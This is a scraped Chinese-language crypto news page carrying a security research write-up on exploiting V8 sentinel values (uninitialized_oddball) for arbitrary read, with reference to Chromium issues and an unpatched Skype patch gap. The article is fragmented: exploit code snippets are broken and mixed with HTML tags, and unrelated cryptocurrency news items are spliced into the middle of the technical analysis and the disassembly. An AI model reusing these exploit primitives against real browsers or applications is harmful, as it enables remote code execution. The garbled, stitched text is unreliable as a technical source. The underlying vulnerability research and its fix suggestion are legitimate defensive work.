BTC/HKD+0.38%
ETH/HKD+0.15%
LTC/HKD-0.5%
DOT/HKD+0.79%
ADA/HKD+1.01%
SOL/HKD-0.03%
XRP/HKD+0.9%
DOGE/US-0.15%前言
Sentinelvalue(又名flagvalue/tripvalue/roguevalue/signalvalue/dummydata)是算法中的一個特殊值,通常在循環或遞歸算法中作為終止條件的特殊值存在。Chrome源碼中有很多Sentinelvalue。from-leaking-thehole-to-chrome-renderer-rce和TheHoleNewWorld-howasmallleakwillsinkagreatbrowser(CVE-2021-38003)中,都介紹了如何通過泄露TheHole對象實現CVE-2021-38003和CVE-2022–1364的沙箱內任意代碼執行。在我們發文闡述該緩解繞過大概一周后,谷歌團隊也迅速把這兩個在野CVE同步更新到了github上。時間節點如下:
{this</p>
<p> <b>fhi(f){this</b></p>
<p> flow(f){this</p>
<p> }functionUninitializedOddballExploiter(uninitialized_oddball){varh=newHelpers();letarr=newArray(0x1000000);arr=1</p>
<p> ;%PrepareFunctionForOptimization(read);read(exp2,0);%OptimizeFunctionOnNextCall(read);constold_space=0x200000;//0x200000letstart_offset=Math</p>
<p> 數據:比特幣波動性指數升至年初以來的最高水平:金色財經報道,比特幣周日結束了第四周的窄幅交易,波動性指數升至年初以來的最高水平。99Bitcoins的數據顯示,比特幣的30天預估值已降至0.74%,這是自1月16日以來的最低估值。 </p>
<p> 比特幣的波動性詳細說明了其價格在一天內變化的幅度。如果該指數很高,投資風險就會加大,從而導致更難預測的價格波動。數據顯示,用于判斷比特幣期權合約30天隱含波動率的T3I BitVol指數也跌至四年多前推出該指數以來的最低水平。 </p>
<p> CVI的加密波動指數旨在模仿與標準普爾500指數VIX類似的功能,該指數也跌至歷史最低水平。該指數考慮了比特幣和以太坊在30天內的隱含波動率。隱含波動率是市場對資產價格未來變化幅度的預測,而已實現波動率是衡量資產價格過去實際變化幅度的指標。[2023/7/24 15:55:06]</p>
<p> }UninitializedOddballExploiter(%TheHole());//注意對%TheHole()做patch</p>
<p> 我們對上述代碼在v8-11.0.0中測試,當%TheHole()返回UninitializedOddball時,仍舊可以實現相對任意讀。</p>
<p> ./d8--expose-gc--allow-natives-syntax--print-opt-code--print-opt-code-filter=read--trace-turbo/home/avboy/Desktop/poc2.js</p>
<p> 對優化后的JavaScript的read函數去掉Prologue,留下關鍵反匯編如下所示:</p>
<p> 孫宇晨:波場穩定幣市值已經接近500億美元,2023年目標為1000億美元:據官方最新消息,波場TRON創始人孫宇晨在推特發文表示:“兩周前我們發布了穩定幣市值600億美元的宏偉目標。從那時起,我們面臨無數挑戰,但我們的決心依然堅定!自豪地宣布我們已經接近500億!重新考慮我們2023年的穩定幣市值目標,600億太過保守,讓我們以1000億美元為目標!”[2023/3/31 13:37:03]</p>
<p> 0x558b2000406929488b4d18REX.Wmovqrcx,0x558b2000406d2df6c101testbrcx,0x1;;checkifrcx(ie.obj,the1stargoffunction)is'Smi'0x558b20004070300f842e020000jz0x558b200042a4<+0x264>;;deoptreason'Smi'0x558b200040763641b831cd1900movlr8,0x19cd31;;(compressed)object:0x17140019cd31<Map(HOLEY_ELEMENTS)>0x558b2000407c3c443941ffcmpl,r8;;checkthemap(r8=0x19cd31isthemapofobj);;herewecheckthemapofobj,butwedidnotcheckthevalueofkey(ie.obj.prop);;andifwemakethevalueofkeytobeuninitialized_oddball,thereisthebypass0x558b20004080400f8522020000jnz0x558b200042a8<+0x268>;;deoptreason'wrongmap'0x558b2000408646448b410bmovlr8,;;*(addr(obj)+0xb)->r80x558b2000408a4a478b44060bmovlr8,;;r14ishighaddr0x558b2000408f4f4d03c6REX.Waddqr8,r14;;r8->inReadOnlySpace:#uninitialized0x558b2000409252458b4807movlr9,;;0x558b20004096564d03ceREX.Waddqr9,r14;;r9->0x2eb90000000d0x558b2000409959458b400bmovlr8,;;0x558b2000409d5d488b7d20REX.Wmovqrdi,;;rdiisindexofarr,the2ndargoffunction0x558b200040a16140f6c701testbrdi,0x1;;checkifrdiis'Smi'0x558b200040a5650f85da000000jnz0x558b20004185B5<+0x145>;;ifrdiisnot'Smi',JMP0x558b200040ab6b4c63dfREX.Wmovsxlqr11,rdi;;0x558b200040ae6e49d1fbREX.Wsarqr11,1;;r11/2,because'Smi'storedas'Smi'*2inMemory0x558b200040b1714d63c0REX.Wmovsxlqr8,r80x558b200040b47449d1f8REX.Wsarqr8,10x558b200040b7774d3bd8REX.Wcmpqr11,r8;;r11=0x40002,real_offsetastheindexofarr0x558b200040ba7a0f83ec010000jnc0x558b200042ac<+0x26c>;;deoptreason'outofbounds'0x558b200040c080c4817b1044d907vmovsdxmm0,;;movedoublefloatvaluetoxmm00x558b200040c787c5f92ec0vucomisdxmm0,xmm0;;ComparefloatvalueandSetEFLAGS0x558b200040cb8b0f8a88010000jpe0x558b20004259B9<+0x219>;;jpe(Jumpifparityeven)0x558b200040d1????91??0f8582010000?????????jnz?0x558b20004259??B9?<+0x219>??;;?jnz(Jump?if?not?zero)</p>
<p> 去中心化域名協議SPACE ID 2.0 Beta版本上線:2月15日消息,去中心化域名協議SPACE ID 2.0 Beta版本正式上線,SPACE ID 2.0提供一站式Web3域名和身份平臺來發現、注冊、交易和管理Web3域名。此外,SPACE ID 2.0還包含一個面向跨區塊鏈開發者的Web3域名SDK&API,并且將推出多鏈域名服務,以支持更多的區塊鏈。[2023/2/15 12:08:27]</p>
<p> 在0x558b2000407c處,檢查了read函數的obj,確定其prop屬性正確,但沒有檢查以obj.prop為key的Value,而是直接按照JavaScript語義計算偏移,求取數組的數值。如此導致我們在計算的時造成類型混淆,實現任意讀。</p>
<p> 如上匯編所示,當我們傳入uninitialized_oddball時,從0x558b20004086開始以obj為起點計算,最終在vmovsdxmm0,指令中完成任意讀,數據保存在xmm0寄存器中。類似TheHole對象,由于uninitialized_oddball在v8內存中排序靠前,且對象內容更加原始,偽造更加容易,在TheHole緩解繞過修復后,該方法不失為繞過首選。同理,任意寫我們可以參考Issue1352549進行構造分析。由于原理雷同,這里不再贅述。</p>
<p> 這里修復建議是,對優化后的函數返回數組元素時,添加對數組map的檢查,避免直接計算偏移返回數組數值。</p>
<p> PatchGapAlert</p>
<p> 在我們談論PatchGap時,實際上我們不僅僅需要關注曾經出現的歷史漏洞,我們還要關注廠商在基礎組件中悄悄修復的漏洞。對Issue1352549分析后,我們迅速排查了可能存在PatchGap的軟件,這里不得不指出,截至目前Skype仍舊沒有對該漏洞進行修復。在x86下任意讀寫會稍有不同。x64下由于存在地址壓縮,在tuborgfun優化javascript生成的代碼中,v8會默認將基址加上。x86由于沒有基址,因此任意讀寫是直接相對于整個進程的。如下匯編所示:</p>
<p> 市場分析:美聯儲將強調他們對提高利率的堅定態度:12月4日消息,在即將進行的美聯儲利率決議中,美聯儲官員可能還想強調他們對更高利率的堅定態度,以反擊華爾街,因為華爾街認為,美聯儲計劃下調加息幅度是放寬金融環境,這可能是不受歡迎的。美聯儲一直在刻意收緊環境,以減少需求和緩解價格壓力。\)
Amherst Pierpont Securities LLC的首席經濟學家Stephen Stanley說,“美聯儲仍有很多工作要做,以讓經濟得到足夠的冷卻,特別是勞動力市場,才能達到他們想要的通脹水平。我們肯定還沒有達到那個目標。\"(金十)[2022/12/4 21:21:21]
0x3979b8ff3f8b790bmovedi,0x3979b902428b7f0bmovedi,0x3979b905458b4707moveax,;;eaxwillbeafixednumber0x3979b908488b7f0bmovedi,0x3979b90b4b8b5510movedx,0x3979b90e4ef6c201test_bdl,0x10x3979b911510f85b6000000jnz0x3979b9cd<+0x10d>0x3979b9175789d6movesi,edx0x3979b91959d1fesaresi,1;;esiisindex0x3979b91b5bd1ffsaredi,1;;0x3734b73a0x3979b91d5d3bf7cmpesi,edi0x3979b91f5f0f838e010000jnc0x3979bab3<+0x1f3>;;deoptreason'outofbounds'0x3979b92565c5fb104cf007vmovsdxmm1,xmm0,;;
音樂游戲開發商Blockstars完成500萬美元融資,Future Fund領投:11月6日消息,Solana鏈上音樂管理模擬游戲開發商Blockstars宣布完成500萬美元新一輪股權和代幣輪融資,Play Ventures旗下Future Fund領投,Makers Fund、Solana、Magic Eden、Merit Circle和Citizen X參投,該公司正在考慮使用人工智能和區塊鏈融合技術來創作歌曲,未來還將探索制作更多Web3游戲。
據悉,Blockstars的前身是車載語音驅動游戲開發商Drivetime,后者在疫情期間轉型開始構建區塊鏈游戲并完成了更名,Blockstars正在開發同名游戲,玩家可以創作、錄制和發行單曲并參加音樂比賽,獲勝者可以贏得原生代幣ROC獎勵。(venturebeat)[2022/11/6 12:23:05]
如上所示,esi為任意讀數組的索引,eax為固定值,edi為"outofbounds"檢測的數值,實際上調試時我們可以看到,edi為一個很大的數值,遠超過聲明時數組的最大范圍。
因此,在edi范圍內,可以任意讀寫。在具體做skype的exp時,雖然此時我們沒有地址壓縮帶來內存讀寫的便利,且skype開啟了aslr。但由于該文件太大,直接放在4GB內存中,黑客只需要對某個固定地址進行讀寫,便可以一個極大的概率讀寫skype文件中的內容。結合PE解析等傳統思路,不難完成整個漏洞利用鏈。基于此,我們無法保證黑客不能在短時間內完成整個利用鏈的適配。
這次PatchGap實際上不止需要排查Issue1352549,由于一個新的繞過方法的公開,直接導致了類似Issue1314616和Issue1216437的利用難度大幅度降低,黑客幾乎不需要花費任何研究成本,即可實現以往任何泄露uninitialized_oddball漏洞的完整利用,包括谷歌clusterfuzz提交的所有Issue中類似的漏洞。
總結
本文僅拋磚引玉,粗略來談通過泄露Sentinelvalue中的uninitialized_Oddball來實現任意讀原語。如第二部分所示,v8中的Sentinelvalue還有很多,實際上我們在測試Sentinelvalue的時候,也會經常容易遇到崩潰,不乏有非int3的崩潰出現。由于Uninitialized_Oddball和TheHole均已被證明可以在v8中實現環節繞過,我們有充分的理由懷疑其他Sentinelvalue也可能導致類似問題。
這也給我們一點提示:
01-其他uninitialized_Oddball泄露是否會輕松實現v8的RCE;
02-我們已經看到,谷歌會迅速將TheHole繞過進行修復,我們也看到利用垃圾回收實現ASLR繞過被長期擱置。這說明類似issue仍處在一個模糊邊界,即是否被正式當作安全問題對待。
03-如果02中的問題被當作正式安全問題對待,那么在fuzzer中是否有必要考慮將%TheHole/uninitialized_Oddball等Sentinelvalue作為變量加入,來挖掘其他利用原語;
這里不得不強調的是,無論該類問題是否被正式當作安全問題對待,它都會大大縮減黑客實現完整利用周期。
參考資料
https://bugs.chromium.org/p/chromium/issues/detail?id=1314616
https://bugs.chromium.org/p/chromium/issues/detail?id=1352549
https://bugs.chromium.org/p/chromium/issues/detail?id=1216437
https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/
一、過去一周行業發生重要事件 1.產業 外媒:幣安完成對Gopax的收購盡調,擬收購其41.2%的股份知情人士稱,Binance已于近日完成對韓國交易所Gopax的收購盡職調查.
1900/1/1 0:00:00隨著元宇宙,WEB3,NFT等概念被炒熱,大量品牌開始布局虛擬場景活動和游戲,發行NFT等。然而大多數人對于NFT的印象都是被炒作的,看不懂的圖片,頭像或者視頻做成的收藏品.
1900/1/1 0:00:00在廣義的理解中,區塊鏈是比特幣的底層技術,它一共有六層架構:數據層、網絡層、共識層、激勵層、合約層和應用層.
1900/1/1 0:00:00關于Web3的概念,我們現在比較熟悉的是由GavinWood于2014年提出的融合去中心化區塊鏈技術以及代幣經濟學的迭代互聯網想法.
1900/1/1 0:00:002022?年?12?月?28?日,前?MicroStrategy?首席執行官?MichaelSaylor?在社交媒體宣布該公司已增持約?2500?枚比特幣.
1900/1/1 0:00:00加密貨幣波動性根植內部,整個2022年該特征更是尤為明顯。"加密貨幣寒潮"成功超過大部分數字資產躋身頭條新聞,而當下這一年,正以一連串的崩潰和破產而接近告終.
1900/1/1 0:00:00
以太坊價格
